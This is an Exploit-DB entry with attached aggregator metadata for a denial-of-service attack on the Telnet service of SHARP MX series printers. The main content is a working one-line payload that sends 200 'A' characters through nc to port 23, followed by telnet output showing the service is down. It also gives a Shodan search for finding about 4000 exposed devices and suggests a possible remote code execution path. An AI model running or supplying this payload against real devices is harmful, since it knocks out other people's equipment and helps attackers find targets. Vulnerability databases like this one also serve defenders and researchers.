ID EDB-ID:34306 Type exploitdb Reporter pws Modified 2014-08-09T00:00:00
Description
SHARP MX Series - Denial of Service. Dos exploit for hardware platform
# Exploit Title: SHARP MX Series - Denial Of Service
# Date: 08/08/2014
# Exploit Author: pws
# Vendor Homepage: Sharp Printers
# Firmware Link: Not found
# Tested on: Latest version
# Shodan d0rk: "SHARP Telnet server" ~4000 devices
# CVE : None yet
$ python -c 'print "A"*200 + "\n"' | nc 192.168.30.5 23
$ telnet 192.168.30.5 23
Trying 192.168.30.5 23...
telnet: Unable to connect to remote host: Connection refused
This vulnerability leads to a Denial of Service vulnerability.
Unfortunately, we were unable to retrieve the core dumped but
this flaw might result in a Buffer Overflow allowing remote command execution.
{"id": "EDB-ID:34306", "hash": "c7abd4f2ae2de36970938e1ebdf89c94", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SHARP MX Series - Denial of Service", "description": "SHARP MX Series - Denial of Service. Dos exploit for hardware platform", "published": "2014-08-09T00:00:00", "modified": "2014-08-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/34306/", "reporter": "pws", "references": [], "cvelist": [], "lastseen": "2016-02-03T20:55:00", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2016-02-03T20:55:00"}, "dependencies": {"references": [], "modified": "2016-02-03T20:55:00"}, "vulnersScore": 0.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/34306/", "sourceData": "# Exploit Title: SHARP MX Series - Denial Of Service\r\n# Date: 08/08/2014\r\n# Exploit Author: pws\r\n# Vendor Homepage: Sharp Printers\r\n# Firmware Link: Not found\r\n# Tested on: Latest version\r\n# Shodan d0rk: \"SHARP Telnet server\" ~4000 devices\r\n# CVE : None yet\r\n\r\n$ python -c 'print \"A\"*200 + \"\\n\"' | nc 192.168.30.5 23\r\n\r\n$ telnet 192.168.30.5 23\r\nTrying 192.168.30.5 23...\r\ntelnet: Unable to connect to remote host: Connection refused\r\n\r\nThis vulnerability leads to a Denial of Service vulnerability. \r\n\r\nUnfortunately, we were unable to retrieve the core dumped but \r\nthis flaw might result in a Buffer Overflow allowing remote command execution.", "osvdbidlist": ["110048"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}